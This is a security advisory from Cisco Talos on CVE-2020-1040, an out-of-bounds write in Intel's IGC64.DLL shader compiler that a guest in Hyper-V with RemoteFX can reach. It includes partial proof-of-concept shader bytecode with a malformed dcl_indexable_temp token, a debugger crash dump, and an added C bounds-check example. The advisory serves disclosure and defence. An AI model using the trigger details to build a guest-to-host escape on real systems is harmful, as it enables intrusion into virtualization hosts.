Microsoft Hyper-V/RemoteFX: CVE-2020-1040
An exploitable memory corruption vulnerability exists in Intel’s IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running in virtualization environments (e.g. VMware, QEMU, VirtualBox) in order to perform a guest-to-host escape, as was demonstrated previously in TALOS-2018-0533, TALOS-2018-0568 and others. In theory, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly), but Talos has not been able to confirm this.
Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel(R) Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1040)
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787: Out-of-bounds Write
This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (this driver is mapped by the affected component, e.g. VMware’s vmware-vmx.exe).
Example of compute shader triggering the bug:
cs_5_0
00000000: 0x000002f8 - 0x000002fc 6a 08 00 01 dcl_global_flags refactoringAllowed
00000001: 0x000002fc - 0x0000030c 59 00 00 04 46 8e 20 00 00 00 00 00 01 00 00 00 dcl_constant_buffer cb0[1].xyzw, immediateIndexed
00000002: 0x0000030c - 0x0000031c 58 18 00 04 00 70 10 00 00 00 00 00 44 44 00 00 dcl_resource_texture2d resource[0]
...
00000007: 0x0000035c - 0x00000364 5f 00 00 02 32 10 02 00 dcl_input vThreadGrouID.xy
00000008: 0x00000364 - 0x0000036c 5f 00 00 02 32 00 02 00 dcl_input vThreadID.xy
00000009: 0x0000036c - 0x00000374 68 00 00 02 04 00 00 00 dcl_temps 4
00000010: 0x00000374 - 0x00000384 69 00 00 04 00 00 c6 f4 83 00 00 00 04 00 00 00 dcl_indexable_temp x4106616832[131], 4
The DCL_INDEXABLETEMP instruction declares an indexable temporary register. By malforming this instruction, an attacker is able to cause an arbitrary memory write.
Importantly, the attacker can control the RDI register (used as the index in the destination memory address calculation), since its value is taken directly from the shader. This gives the attacker control over the destination address of an arbitrary memory write.
0:006> r
rax=000002123b089e90 rbx=0000000000000083 rcx=0000021239050000
rdx=0000021239050000 rsi=0000000000000004 rdi=00000000f4c60000
rip=00007ffc713762eb rsp=0000005b556fe510 rbp=0000005b556fe610
r8=000002123b08a201 r9=000002123b082090 r10=0000000000000003
r11=0000005b556fe430 r12=0000000000000000 r13=000002123b083fc0
r14=0000000000000004 r15=0000000000000069
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
igc64!OpenCompiler12+0x6eb5b:
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx ds:00000216`0e209e90=????????
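The register index that ends up in RDI is the second DWORD of the dcl_indexable_temp token quoted above: the decimal x4106616832 in the disassembly is 0xf4c60000, exactly the RDI value in the register dump, while the EBX being stored (0x83 = 131) is the declared register count. The following added C example (not Talos's or Intel's code) decodes that token from the quoted bytes and shows the bounds check a compiler must apply before using a shader-supplied index as a table index; the table size MAX_INDEXABLE_TEMPS is an assumed, illustrative value.

```c
#include <stdint.h>
#include <stddef.h>
/* dcl_indexable_temp as four little-endian DWORDs in the DXBC token stream. */
typedef struct {
    uint32_t opcode;     /* low 11 bits of the opcode token; 0x69 = dcl_indexable_temp */
    uint32_t length;     /* instruction length in DWORDs (bits 24..30) */
    uint32_t reg_index;  /* x# register index: the value that lands in RDI */
    uint32_t reg_count;  /* number of registers; 0x83 = 131 in the PoC */
    uint32_t components; /* components per register */
} dcl_indexable_temp_t;
/* Constructed from the token bytes quoted in the PoC disassembly above. */
static const uint8_t POC_DCL[16] = { 0x69, 0x00, 0x00, 0x04,  0x00, 0x00, 0xc6, 0xf4,
                                     0x83, 0x00, 0x00, 0x00,  0x04, 0x00, 0x00, 0x00 };
/* Assumed size of the compiler's per-register table (illustrative, not IGC's value). */
#define MAX_INDEXABLE_TEMPS 4096u

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse one dcl_indexable_temp instruction; 0 on success, -1 on a malformed token. */
int parse_dcl_indexable_temp(const uint8_t *buf, size_t len, dcl_indexable_temp_t *out) {
    if (len < 16) return -1;
    uint32_t op = le32(buf);
    out->opcode = op & 0x7ff;
    out->length = (op >> 24) & 0x7f;
    if (out->opcode != 0x69 || out->length != 4) return -1;
    out->reg_index  = le32(buf + 4);
    out->reg_count  = le32(buf + 8);
    out->components = le32(buf + 12);
    return 0;
}

/* Hardened counterpart of the faulting store mov dword ptr [rax+rdi*4],ebx: the
 * shader-supplied index is checked against the table size before it is used. */
int declare_indexable_temp(uint32_t *table, size_t table_len, const dcl_indexable_temp_t *d) {
    if (d->reg_index >= table_len) return -1;   /* out-of-range x# index: reject the shader */
    if (d->reg_count == 0 || d->components == 0 || d->components > 4) return -1;
    table[d->reg_index] = d->reg_count;          /* table[rdi] = ebx, now bounded */
    return 0;
}

/* Runs the PoC declaration through the validator; returns 1 if parsed and rejected. */
int poc_is_rejected(void) {
    dcl_indexable_temp_t d;
    uint32_t table[MAX_INDEXABLE_TEMPS] = { 0 };
    if (parse_dcl_indexable_temp(POC_DCL, sizeof POC_DCL, &d) != 0) return 0;
    return declare_indexable_temp(table, MAX_INDEXABLE_TEMPS, &d) == -1;
}
```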
Stack trace:
0:006> kb
# RetAddr : Args to Child : Call Site
00 00007ffc`71335b2d : 00000000`00000001 0000005b`556fe770 00000000`00002000 00000000`04000069 : igc64!OpenCompiler12+0x6eb5b
01 00007ffc`713344f2 : 00000000`00000002 00000212`3b07a094 00000212`3b07a0a4 0000005b`556ff200 : igc64!OpenCompiler12+0x2e39d
02 00007ffc`713341a3 : 00000000`00000000 00000212`3b083fc0 00000000`00000002 00000000`00000000 : igc64!OpenCompiler12+0x2cd62
03 00007ffc`7133406f : 00000212`3b07a010 00000212`3b07a010 00000212`3b07a010 00000212`3b082090 : igc64!OpenCompiler12+0x2ca13
04 00007ffc`7130a23e : 00000212`3b077b00 0000005b`556ff370 00000212`3b082090 00000212`3b082090 : igc64!OpenCompiler12+0x2c8df
05 00007ffc`7130cb02 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igc64!OpenCompiler12+0x2aae
06 00007ffc`748f7299 : 00000000`00000000 00000000`00000010 00000000`00000000 00000000`40000068 : igc64!OpenCompiler12+0x5372
07 00007ffc`749ed34f : 00000000`00000010 00000000`00000020 00000000`00000000 0000005b`556ff9f0 : igd10iumd64!OpenAdapter10_2+0x2fc79
08 00007ffc`748f5187 : 00000212`3b077d58 00000212`3b05b1a0 00000000`00000000 00000212`3b05a9a0 : igd10iumd64!OpenAdapter10_2+0x125d2f
09 00007ffc`75028d50 : 00000000`00000000 00000000`00000000 00000212`3b077d90 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x2db67
0a 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x761730
0b 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:006> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.Sec
Value: 0
Key : Analysis.Elapsed.Sec
Value: 61
Key : Analysis.Memory.CommitPeak.Mb
Value: 68
Key : Timeline.OS.Boot.DeltaSec
Value: 128651
Key : Timeline.Process.Start.DeltaSec
Value: 213
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-01-12T15:14:18.526Z
Diff: 526 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-01-12T15:14:18.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-01-12T15:10:45.0Z
Diff: 213000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-01-11T03:30:07.0Z
Diff: 128651000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
MODLIST_WITH_TSCHKSUM_HASH: 55cdb3bc7aae3aedb1ba047e3d2dba6243aad2f9
MODLIST_SHA1_HASH: 6ce0e83b6da7c6a553d1e322f42f958f3d7a27e9
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
FAULTING_IP:
igc64!OpenCompiler12+6eb5b
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffc713762eb (igc64!OpenCompiler12+0x000000000006eb5b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000002160e209e90
Attempt to write to address 000002160e209e90
FAULTING_THREAD: 00000ab4
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: POC_EXEC11.exe
FOLLOWUP_IP:
igc64!OpenCompiler12+6eb5b
00007ffc`713762eb 891cb8 mov dword ptr [rax+rdi*4],ebx
WRITE_ADDRESS: 000002160e209e90
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000002160e209e90
WATSON_BKT_PROCSTAMP: 5e1b04b9
WATSON_BKT_MODULE: igc64.dll
WATSON_BKT_MODSTAMP: 5ddcfccd
WATSON_BKT_MODOFFSET: ab62eb
WATSON_BKT_MODVER: 26.20.100.7584
MODULE_VER_PRODUCT: Intel HD Graphics Drivers for Windows(R)
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: IAMLEGION
ANALYSIS_SESSION_TIME: 01-12-2020 16:14:18.0526
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xab4]
Frame: [0] : igc64!OpenCompiler12
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xab4]
Frame: [0] : igc64!OpenCompiler12
LAST_CONTROL_TRANSFER: from 00007ffc71335b2d to 00007ffc713762eb
STACK_TEXT:
0000005b`556fe510 00007ffc`71335b2d : 00000000`00000001 0000005b`556fe770 00000000`00002000 00000000`04000069 : igc64!OpenCompiler12+0x6eb5b
0000005b`556fe670 00007ffc`713344f2 : 00000000`00000002 00000212`3b07a094 00000212`3b07a0a4 0000005b`556ff200 : igc64!OpenCompiler12+0x2e39d
0000005b`556ff0a0 00007ffc`713341a3 : 00000000`00000000 00000212`3b083fc0 00000000`00000002 00000000`00000000 : igc64!OpenCompiler12+0x2cd62
0000005b`556ff0e0 00007ffc`7133406f : 00000212`3b07a010 00000212`3b07a010 00000212`3b07a010 00000212`3b082090 : igc64!OpenCompiler12+0x2ca13
0000005b`556ff1e0 00007ffc`7130a23e : 00000212`3b077b00 0000005b`556ff370 00000212`3b082090 00000212`3b082090 : igc64!OpenCompiler12+0x2c8df
0000005b`556ff270 00007ffc`7130cb02 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igc64!OpenCompiler12+0x2aae
0000005b`556ff870 00007ffc`748f7299 : 00000000`00000000 00000000`00000010 00000000`00000000 00000000`40000068 : igc64!OpenCompiler12+0x5372
0000005b`556ff8a0 00007ffc`749ed34f : 00000000`00000010 00000000`00000020 00000000`00000000 0000005b`556ff9f0 : igd10iumd64!OpenAdapter10_2+0x2fc79
0000005b`556ff8f0 00007ffc`748f5187 : 00000212`3b077d58 00000212`3b05b1a0 00000000`00000000 00000212`3b05a9a0 : igd10iumd64!OpenAdapter10_2+0x125d2f
0000005b`556ffaf0 00007ffc`75028d50 : 00000000`00000000 00000000`00000000 00000212`3b077d90 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x2db67
0000005b`556ffb60 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x761730
0000005b`556ffb90 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000005b`556ffbc0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
STACK_COMMAND: ~6s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: 5864a9a245aa9d7d72dd761f45b4ecad1094c55a
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 1dde1ebb049458f27fe5decc4c746621e995ae5d
THREAD_SHA1_HASH_MOD: d3c4318038da893d2045ecf22932c2d470c55d2e
FAULT_INSTR_CODE: 49b81c89
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: igc64!OpenCompiler12+6eb5b
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: igc64
IMAGE_NAME: igc64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5ddcfccd
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_igc64.dll!OpenCompiler12
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!OpenCompiler12+6eb5b
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: igc64.dll
BUCKET_ID_IMAGE_STR: igc64.dll
FAILURE_MODULE_NAME: igc64
BUCKET_ID_MODULE_STR: igc64
FAILURE_FUNCTION_NAME: OpenCompiler12
BUCKET_ID_FUNCTION_STR: OpenCompiler12
BUCKET_ID_OFFSET: 6eb5b
BUCKET_ID_MODTIMEDATESTAMP: 5ddcfccd
BUCKET_ID_MODCHECKSUM: 2450ddb
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: igc64.dll!OpenCompiler12
TARGET_TIME: 2020-01-12T15:15:19.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: ee9e
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_igc64.dll!opencompiler12
FAILURE_ID_HASH: {1c89f3a6-178c-7483-67bb-857d785cefd5}
Followup: MachineOwner
---------
Discovered by Piotr Bania of Cisco Talos.
http://talosintelligence.com/vulnerability-reports/
2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release